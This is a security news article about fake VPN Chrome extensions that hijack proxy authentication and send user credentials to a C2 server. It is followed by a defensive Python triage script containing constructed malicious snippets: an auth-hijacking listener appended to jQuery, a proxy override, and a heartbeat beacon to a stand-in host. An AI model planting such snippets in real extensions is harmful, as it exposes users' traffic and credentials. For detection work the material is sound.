
The extensions, published by the same threat actor using theknewone.com@gmail[.]com, have been active since 2017 and remain available on the Chrome Web Store, with more than 2,180 installations.
Marketed as “multi-location network speed testing plugins,” the extensions offer paid subscriptions ranging from ¥9.9 to ¥95.9 CNY ($1.40–$13.50 USD), giving users the illusion of legitimate VPN functionality.
Behind this professional interface, complete with Alipay and WeChat Pay payment integrations, the extensions perform full-scale traffic interception and credential exfiltration, functioning as man-in-the-middle (MITM) proxies.
Upon installation, Phantom Shuttle injects malicious code into the legitimate jQuery v1.12.2 library. This allows the extensions to automatically inject hardcoded proxy credentials (topfany/963852wei) into every HTTP authentication challenge via the Chrome webRequest onAuthRequired API.
This operation transparently reroutes all user traffic through threat-actor-controlled proxy servers, thereby enabling continuous data capture without consent.
Credential Exfiltration and C2 Infrastructure
The extensions periodically communicate with their command-and-control (C2) server at phantomshuttle[.]space, hosted on Alibaba Cloud in Hong Kong.
The server, active as of December 23, 2025, manages user authentication, subscription status, and VIP level tracking.
Every five minutes, the extensions send user credentials, including email and plaintext passwords, via a heartbeat beacon to maintain session activity and relay stolen data.
Phantom Shuttle’s “smart proxy” mode selectively routes traffic from more than 170 high-value domains, including developer platforms such as GitHub, Stack Overflow, and Docker, as well as corporate and social media domains such as AWS, Twitter, and Facebook.
The targeting of developer tools and cloud services suggests a supply chain risk: stolen API keys and repository credentials could enable secondary compromises or malicious code-injection campaigns.
Socket’s further inspection revealed that the C2 uses multiple active endpoints for account registration, payment, and configuration retrieval.
All proxy authentication and update commands pass through these APIs, providing the threat actor with complete visibility into user activity and credentials.
Socket’s analysis attributes the campaign to a long-running, financially motivated operation rather than opportunistic malware.
By blending a subscription-based business model with browser permissions for proxy and webRequest control, Phantom Shuttle demonstrates how malicious extensions can monetize user trust and persist undetected for years.
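The behaviours described above (a proxy-capable permission set, an onAuthRequired listener that answers every challenge with hardcoded credentials, and a fixed-interval heartbeat) can be checked for statically in an unpacked extension. The following triage script is an added example for defenders, not code from Socket or from the extension itself; the manifest, script snippets, credential values and C2 hostname it contains are constructed samples, and the permission names are the real Chrome ones (webRequestBlocking for Manifest V2, webRequestAuthProvider for Manifest V3).

```python
"""Static triage of an unpacked Chrome extension for the proxy-hijack pattern:
proxy control + auth interception permissions, an onAuthRequired listener
returning literal credentials, and a setInterval beacon in the 1-60 min range.
All sample inputs below are constructed; none are taken from a real extension.
"""
import json
import re

# Permission that lets an extension rewrite the browser's proxy settings.
PROXY_PERM = "proxy"
# Permissions needed to answer auth challenges from onAuthRequired.
AUTH_BLOCKING_PERMS = {"webRequestBlocking", "webRequestAuthProvider"}

# Indicator patterns searched in each script file.
AUTH_LISTENER_RE = re.compile(r"webRequest\.onAuthRequired\.addListener")
LITERAL_CREDS_RE = re.compile(
    r"authCredentials\s*:\s*\{[^}]*username\s*:\s*['\"][^'\"]+['\"]"
    r"[^}]*password\s*:\s*['\"][^'\"]+['\"]",
    re.S,
)
PROXY_SET_RE = re.compile(r"chrome\.proxy\.settings\.set")
INTERVAL_RE = re.compile(r"setInterval\s*\(.*?,\s*(\d+)\s*\)", re.S)


def triage(manifest, scripts):
    """Return findings for one extension.

    manifest: parsed manifest.json (dict); scripts: {filename: source text}.
    """
    perms = set(manifest.get("permissions", []))
    findings = {
        "proxy_permission": PROXY_PERM in perms,
        "auth_interception_permission": "webRequest" in perms
        and bool(perms & AUTH_BLOCKING_PERMS),
        "sets_proxy_config": False,
        "hardcoded_auth_listener": False,
        "heartbeat_intervals_min": [],
    }
    for src in scripts.values():
        if PROXY_SET_RE.search(src):
            findings["sets_proxy_config"] = True
        # Listener plus literal username/password in the same file.
        if AUTH_LISTENER_RE.search(src) and LITERAL_CREDS_RE.search(src):
            findings["hardcoded_auth_listener"] = True
        for m in INTERVAL_RE.finditer(src):
            ms = int(m.group(1))
            if 60_000 <= ms <= 3_600_000:  # plausible beacon cadence
                findings["heartbeat_intervals_min"].append(ms / 60_000)

    indicators = sum([
        findings["proxy_permission"],
        findings["auth_interception_permission"],
        findings["sets_proxy_config"],
        findings["hardcoded_auth_listener"],
        bool(findings["heartbeat_intervals_min"]),
    ])
    findings["risk"] = "high" if indicators >= 3 else "medium" if indicators == 2 else "low"
    return findings


# Constructed sample resembling the pattern in the article (not real code).
SAMPLE_MANIFEST = json.loads("""{
  "manifest_version": 2,
  "name": "Network Speed Tester (constructed sample)",
  "permissions": ["proxy", "webRequest", "webRequestBlocking", "storage", "<all_urls>"],
  "background": {"scripts": ["jquery-1.12.2.min.js", "bg.js"]}
}""")
SAMPLE_SCRIPTS = {
    # Constructed: a listener appended to an otherwise legitimate library file.
    "jquery-1.12.2.min.js": """
/* ...minified library body elided... */
chrome.webRequest.onAuthRequired.addListener(function (details) {
  return {authCredentials: {username: "EXAMPLE_USER", password: "EXAMPLE_PASS"}};
}, {urls: ["<all_urls>"]}, ["blocking"]);
""",
    "bg.js": """
chrome.proxy.settings.set({value: {mode: "fixed_servers"}, scope: "regular"});
function heartbeat() { fetch("https://c2.example/api/heartbeat", {method: "POST"}); }
setInterval(heartbeat, 300000);
""",
}

# Constructed benign control: storage only, no proxy or auth handling.
BENIGN_MANIFEST = {"manifest_version": 3, "permissions": ["storage"]}
BENIGN_SCRIPTS = {"bg.js": "chrome.storage.local.get('theme', function (v) {});"}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_MANIFEST, SAMPLE_SCRIPTS), indent=2))
    print(json.dumps(triage(BENIGN_MANIFEST, BENIGN_SCRIPTS), indent=2))
```

The checks are heuristics for triage, not proof of malice: a legitimate corporate proxy helper may legitimately request the proxy permission, so the combination of indicators (and a hardcoded credential pair in a library file that should contain none) is what warrants manual review.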
The post Fake VPN Chrome Extensions Abuse Browser Traffic Visibility to Harvest Sensitive User Credentials appeared first on Cyber Security News.
